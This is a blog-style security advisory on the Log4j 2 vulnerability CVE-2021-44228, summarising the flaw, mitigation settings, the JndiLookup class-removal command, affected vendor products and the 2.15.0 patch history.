Apache Log4j 2 vulnerability CVE-2021-44228
By Alberto on December 11, 2021
A critical security vulnerability has been identified in the popular “Apache Log4j 2” library. This vulnerability is identified as CVE-2021-44228.
Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. In previous releases (>2.10) this behavior can be mitigated by setting system property “log4j2.formatMsgNoLookups” to “true” or by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class). Java 8u121 (see https://www.oracle.com/java/technologies/javase/8u121-relnotes.html) protects against remote code execution by defaulting “com.sun.jndi.rmi.object.trustURLCodebase” and “com.sun.jndi.cosnaming.object.trustURLCodebase” to “false”.
According to Apache’s advisory , all Apache Log4j (version 2.x) versions up to 2.14.1 are vulnerable if message lookup substitution was enabled.
Affected products and services
Confirmed the vulnerability here
Elastic Search (and the Open Distro variants) Elastic Logstash APM Java Agent
The list can be found here
API Portal for VMware Tanzu App Metrics Healthwatch for Tanzu Application Service Single Sign-On for VMware Tanzu Application Service Spring Cloud Gateway for Kubernetes Spring Cloud Gateway for VMware Tanzu Spring Cloud Services for VMware Tanzu VMware Carbon Black Cloud Workload Appliance VMware Carbon Black EDR Servers VMware Cloud Foundation VMware HCX VMware Horizon VMware Identity Manager VMware NSX-T Data Center VMware Site Recovery Manager VMware Tanzu Application Service for VMs VMware Tanzu GemFire VMware Tanzu Greenplum VMware Tanzu Kubernetes Grid Integrated Edition VMware Tanzu Observability by Wavefront Nozzle VMware Tanzu Operations Manager VMware Tanzu SQL with MySQL for VMs VMware Telco Cloud Automation VMware Unified Access Gateway VMware vCenter Cloud Gateway VMware vCenter Server VMware vRealize Automation VMware vRealize Lifecycle Manager VMware vRealize Log Insight VMware vRealize Operations VMware vRealize Operations Cloud Proxy VMware vRealize Orchestrator VMware WorkspaceOne Access
The list can be found here
Cisco Webex Meetings Server Cisco Evolved Programmable Network Manager Cisco Integrated Management Controller (IMC) Supervisor Cisco Intersight Virtual Appliance Cisco UCS Director Cisco Unified Contact Center Enterprise - Live Data server Cisco Video Surveillance Operations Manager Cisco Unified Communications Manager Cloud Cisco Webex Cloud-Connected UC (CCUC) Cisco Common Services Platform Collector (CSPC)
Apereo CAS Blender CheckPoint Quantum Security Management Connect2id server Contrast Security self-hosted and cloud Couchbase Elasticsearch Connector Cpanel via Solr plugin Dynatrace Synthetic Chromium Forcepoint Security Manager & DLP Manager Ghidra GoAnywhere Grails Graylog JAMF Pro JGAAP Jitsi video bridge Kafka Connect CosmosDB Metabase Minecraft clients and servers N-Able Risk Intelligence Nelson Neo4J New Relic Java Agent Okta Radius Server Agent & On-Prem MFA Agent OpenHab OpenNMS OpenSearch PagerDuty Rundeck Pegasystems self-hosted Positive Technologies MaxPatrol VM Puppet Continuous Delivery for Puppet Enterprise PureStorage Portworx and possibly other products Red Hat is reporting affected packages RSA SecureID Authentication Manager SecurityOnion Sophos Mobile EAS Proxy Splunk Spring Boot if log4j was configured SwingSet Talend Component Kit Ubiquiti UniFi Network Application Wowza Streaming Engine ZAP Proxy
With the official Apache patch being released, 2.15.0-rc1 was initially reported to have fixed the CVE-2021-44228 vulnerability. However, a subsequent bypass was discovered. A newly released 2.15.0-rc2 version was in turn released, which protects users against this vulnerability.
According to p0rz9, the Chinese security researcher who first posted the exploit code online, CVE-2021-44228 can only be abused if the log4j2.formatMsgNoLookups option in the library’s configuration is set to false.
In a conversation today, Heige, the founder and CEO of Chinese security firm KnownSec 404 Team and one of the first researchers to understand the vulnerability’s impact, told The Record that today’s Log4j 2.15.0 release basically sets this option to true in order to block attacks.
Unfortunately, this option is set to false by default in old releases, meaning that all past Log4j releases since 2.10.0, when this option was added, are vulnerable by default.
The CVE-2021-44228 vulnerability is still being actively investigated in order to properly identify the full scope severity. Given the information currently available, this vulnerability may have a high impact at present and in the future. Most of the applications being affected are widely used in corporate networks as well as home networks. Users are encouraged to take all necessary steps to ensure they are protected against this vulnerability, as outlined below.